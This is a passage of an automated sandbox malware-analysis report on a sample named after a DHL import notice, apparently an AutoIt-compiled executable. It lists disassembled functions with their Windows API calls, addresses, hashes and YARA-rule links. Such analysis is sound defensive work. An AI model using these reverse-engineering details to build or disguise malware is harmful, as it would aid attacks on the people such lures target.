                                                                                            • Part of subcall function 00833CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00833CCA
                                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00831F64
                                                                                          • GetDlgCtrlID.USER32 ref: 00831F6F
                                                                                          • GetParent.USER32 ref: 00831F8B
                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00831F8E
                                                                                          • GetDlgCtrlID.USER32(?), ref: 00831F97
                                                                                          • GetParent.USER32(?), ref: 00831FAB
                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00831FAE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 711023334-1403004172
                                                                                          • Opcode ID: c040c2a2519ef9fc3e214dcc74c90029cb554d74a542b54f33b993bed6cf41ca
                                                                                          • Instruction ID: d0f948c4f6800638e30954ed0a4fbdd710c315745dfc37788d5d7177a91f0e7a
                                                                                          • Opcode Fuzzy Hash: c040c2a2519ef9fc3e214dcc74c90029cb554d74a542b54f33b993bed6cf41ca
                                                                                          • Instruction Fuzzy Hash: 9C21D474A00214BBCF05AFA0DC89DFEBBB8FF55310F00511AF965A7291DB785905DBA4
                                                                                          Function 00863A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00863A9D
                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00863AA0
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00863AC7
                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00863AEA
                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00863B62
                                                                                          • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00863BAC
                                                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00863BC7
                                                                                          • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00863BE2
                                                                                          • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00863BF6
                                                                                          • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00863C13
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$LongWindow
                                                                                          • String ID:
                                                                                          • API String ID: 312131281-0
                                                                                          • Opcode ID: c59a214f965e6eb3b455eadcf739ebc60044a91f6f00aa9ecbc8637647108561
                                                                                          • Instruction ID: e45152fc0b7719976389e8a4eecb90c29dda43839306d88e3fccdc5d70103545
                                                                                          • Opcode Fuzzy Hash: c59a214f965e6eb3b455eadcf739ebc60044a91f6f00aa9ecbc8637647108561
                                                                                          • Instruction Fuzzy Hash: FC617775A00208AFDB11DFA8CC85EEEB7B8FF09714F14019AFA15E72A1C774AA41DB50
                                                                                          Function 0083B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0083B151
                                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B165
                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0083B16C
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B17B
                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0083B18D
                                                                                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B1A6
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B1B8
                                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B1FD
                                                                                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B212
                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B21D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                          • String ID:
                                                                                          • API String ID: 2156557900-0
                                                                                          • Opcode ID: da8df6e32dd116b085f5b8236f618cd3d2681fb4193a32926f6f01ae1dbd554b
                                                                                          • Instruction ID: ab6a9fd5095eebcf10184cc4fbebd952508abdfc1800ebfe621b6dff2f691d3c
                                                                                          • Opcode Fuzzy Hash: da8df6e32dd116b085f5b8236f618cd3d2681fb4193a32926f6f01ae1dbd554b
                                                                                          • Instruction Fuzzy Hash: 0E318DB5500604BFEB109F64DC49F7EBBA9FBA2311F114519FB06D6190D7B89E408FA4
                                                                                          Function 00802C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 00802C94
                                                                                            • Part of subcall function 008029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000), ref: 008029DE
                                                                                            • Part of subcall function 008029C8: GetLastError.KERNEL32(00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000,00000000), ref: 008029F0
                                                                                          • _free.LIBCMT ref: 00802CA0
                                                                                          • _free.LIBCMT ref: 00802CAB
                                                                                          • _free.LIBCMT ref: 00802CB6
                                                                                          • _free.LIBCMT ref: 00802CC1
                                                                                          • _free.LIBCMT ref: 00802CCC
                                                                                          • _free.LIBCMT ref: 00802CD7
                                                                                          • _free.LIBCMT ref: 00802CE2
                                                                                          • _free.LIBCMT ref: 00802CED
                                                                                          • _free.LIBCMT ref: 00802CFB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: adf0a53b42fecd63d393f147c6ec444dc4f96913b27caae5619afd5b0f42338a
                                                                                          • Instruction ID: 66984fd28c4664983938e33572e93f0776de820ac3546b7486bfa6c02ad33a76
                                                                                          • Opcode Fuzzy Hash: adf0a53b42fecd63d393f147c6ec444dc4f96913b27caae5619afd5b0f42338a
                                                                                          • Instruction Fuzzy Hash: 7211A776100108AFCB42EF58DC46DDD3FA9FF05350F5144A5FA489F262D671EE509B91
                                                                                          Function 007D1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007D1459
                                                                                          • OleUninitialize.OLE32(?,00000000), ref: 007D14F8
                                                                                          • UnregisterHotKey.USER32(?), ref: 007D16DD
                                                                                          • DestroyWindow.USER32(?), ref: 008124B9
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0081251E
                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0081254B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                          • String ID: close all
                                                                                          • API String ID: 469580280-3243417748
                                                                                          • Opcode ID: d098a06f21a0756cf84715e4039835f7fa1bd49f77ab7db8d1a1ebcaa7506bcd
                                                                                          • Instruction ID: f52b2c8fc4bebbeabd160f72dedf6e817803802ab14116889006790b9f23ae66
                                                                                          • Opcode Fuzzy Hash: d098a06f21a0756cf84715e4039835f7fa1bd49f77ab7db8d1a1ebcaa7506bcd
                                                                                          • Instruction Fuzzy Hash: 76D15531702212DFCB19EF15C899AA9F7A5FF04710F5541AEE44AAB362CB34AC62CF50
                                                                                          Function 00847DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00847FAD
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00847FC1
                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00847FEB
                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00848005
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00848017
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00848060
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008480B0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory$AttributesFile
                                                                                          • String ID: *.*
                                                                                          • API String ID: 769691225-438819550
                                                                                          • Opcode ID: 821027af9299ffc462d7674c0ccf5a9703f9efd9fa43fd56a4fcb473a610efd8
                                                                                          • Instruction ID: 406c1af13cc95ccc1d0e32dff101df67c0f5b49b9370128f4e4d3f11aec41960
                                                                                          • Opcode Fuzzy Hash: 821027af9299ffc462d7674c0ccf5a9703f9efd9fa43fd56a4fcb473a610efd8
                                                                                          • Instruction Fuzzy Hash: 47819E72508249DBCB24EF14C844AAEB3E8FF88714F14496AF885C7250EB39DD49CB92
                                                                                          Function 007D5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 007D5C7A
                                                                                            • Part of subcall function 007D5D0A: GetClientRect.USER32(?,?), ref: 007D5D30
                                                                                            • Part of subcall function 007D5D0A: GetWindowRect.USER32(?,?), ref: 007D5D71
                                                                                            • Part of subcall function 007D5D0A: ScreenToClient.USER32(?,?), ref: 007D5D99
                                                                                          • GetDC.USER32 ref: 008146F5
                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00814708
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00814716
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0081472B
                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00814733
                                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008147C4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                          • String ID: U
                                                                                          • API String ID: 4009187628-3372436214
                                                                                          • Opcode ID: c965a63ec1dedb79af1f309a066553d47bfc6efb6f9bc0f62868e6ba442828e0
                                                                                          • Instruction ID: ed44debfab4624ec5da15e16a07d821f1bf9f66ccdc908364f260c779337a6bb
                                                                                          • Opcode Fuzzy Hash: c965a63ec1dedb79af1f309a066553d47bfc6efb6f9bc0f62868e6ba442828e0
                                                                                          • Instruction Fuzzy Hash: 1C712430500209DFDF218F64C984AFA3BB9FF4A325F14166AED55DA2A6C7348C81DF60
                                                                                          Function 0084359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 008435E4
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                          • LoadStringW.USER32(008A2390,?,00000FFF,?), ref: 0084360A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: LoadString$_wcslen
                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                          • API String ID: 4099089115-2391861430
                                                                                          • Opcode ID: 4e1b28de254d09923b55caa5116511f97e995b2522cb6bc79ddbfaaddcfd132c
                                                                                          • Instruction ID: b0d9c84f7356dab1d386e83d296c4b7abe017396d676b576dae1d4258c29caca
                                                                                          • Opcode Fuzzy Hash: 4e1b28de254d09923b55caa5116511f97e995b2522cb6bc79ddbfaaddcfd132c
                                                                                          • Instruction Fuzzy Hash: CC516E71900219FADF14EBA0DC46EEEBB78FF14340F144126F115B22A1EB791A98DBA1
                                                                                          Function 0084C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0084C272
                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0084C29A
                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0084C2CA
                                                                                          • GetLastError.KERNEL32 ref: 0084C322
                                                                                          • SetEvent.KERNEL32(?), ref: 0084C336
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0084C341
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                          • String ID:
                                                                                          • API String ID: 3113390036-3916222277
                                                                                          • Opcode ID: 0621b2468864e4ae664507b7ade2128c2d89725ff33de89b8ed3fee982860f24
                                                                                          • Instruction ID: f6bfe9dc8430199a650e328e19f36b84f0a4957e989cab9524f3fcaeb30c83f7
                                                                                          • Opcode Fuzzy Hash: 0621b2468864e4ae664507b7ade2128c2d89725ff33de89b8ed3fee982860f24
                                                                                          • Instruction Fuzzy Hash: 03316BB160160CAFD7619FA98888ABB7AFCFB49744B14851EF486D2210DBB4DD049B61
                                                                                          Function 0083989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00813AAF,?,?,Bad directive syntax error,0086CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 008398BC
                                                                                          • LoadStringW.USER32(00000000,?,00813AAF,?), ref: 008398C3
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00839987
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleLoadMessageModuleString_wcslen
                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                          • API String ID: 858772685-4153970271
                                                                                          • Opcode ID: 0435bdd2e562c6a85c1c6d67627df4e16e36a2d684438cefc19cd82608d2e3e5
                                                                                          • Instruction ID: 73ff58a6c0b6ed6278f01be205cd327da3739f97f589c8413ea14fdf9ccae2a9
                                                                                          • Opcode Fuzzy Hash: 0435bdd2e562c6a85c1c6d67627df4e16e36a2d684438cefc19cd82608d2e3e5
                                                                                          • Instruction Fuzzy Hash: 0521943190021EEBDF11AF90CC0AEEE7779FF18704F044456F519A51A1EB799628DB51
                                                                                          Function 0083209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetParent.USER32 ref: 008320AB
                                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 008320C0
                                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0083214D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameParentSend
                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                          • API String ID: 1290815626-3381328864
                                                                                          • Opcode ID: aad39cdda1894d3db0c3ecf14bc7ce96a8fd941f39e03b8354cda15b5658b01a
                                                                                          • Instruction ID: df9e6d32b60dc5e02295705b3996f83b9d58ffc66df2799da4e551cd88f3e8ca
                                                                                          • Opcode Fuzzy Hash: aad39cdda1894d3db0c3ecf14bc7ce96a8fd941f39e03b8354cda15b5658b01a
                                                                                          • Instruction Fuzzy Hash: AD110A7668870AFAFA017224DC0ADBB379CFB54724F204156F704F51D1FBA978015654
                                                                                          Function 00808D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4675fee76bb8fae953eacf3ad33a0c6640f561a32047cac8c4c72987e42759b7
                                                                                          • Instruction ID: 1f2837fa008e8cce2bd2b385b8a3db377d692e08726e09e78b10c9c1ac43c489
                                                                                          • Opcode Fuzzy Hash: 4675fee76bb8fae953eacf3ad33a0c6640f561a32047cac8c4c72987e42759b7
                                                                                          • Instruction Fuzzy Hash: E7C1DEB4A04249EFDB619FA8CC45BADBBB0FF0A310F144199E994E73D2CB749941CB61
                                                                                          Function 0080CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                          • String ID:
                                                                                          • API String ID: 1282221369-0
                                                                                          • Opcode ID: 606535a05bec1f74749712f90384796c7bf8132bbef1fb2298d6166acc6bf209
                                                                                          • Instruction ID: fecc9e057db9d6615eb0dfb8ac7ed389a1e26730fe83f2086b3e2e7833990468
                                                                                          • Opcode Fuzzy Hash: 606535a05bec1f74749712f90384796c7bf8132bbef1fb2298d6166acc6bf209
                                                                                          • Instruction Fuzzy Hash: 9D614772A04306AFDBA1AFB89C85A6D7BA5FF02320F14426DF944D72C2DBB19D018752
                                                                                          Function 008650D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00865186
                                                                                          • ShowWindow.USER32(?,00000000), ref: 008651C7
                                                                                          • ShowWindow.USER32(?,00000005,?,00000000), ref: 008651CD
                                                                                          • SetFocus.USER32(?,?,00000005,?,00000000), ref: 008651D1
                                                                                            • Part of subcall function 00866FBA: DeleteObject.GDI32(00000000), ref: 00866FE6
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0086520D
                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0086521A
                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0086524D
                                                                                          • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00865287
                                                                                          • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00865296
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
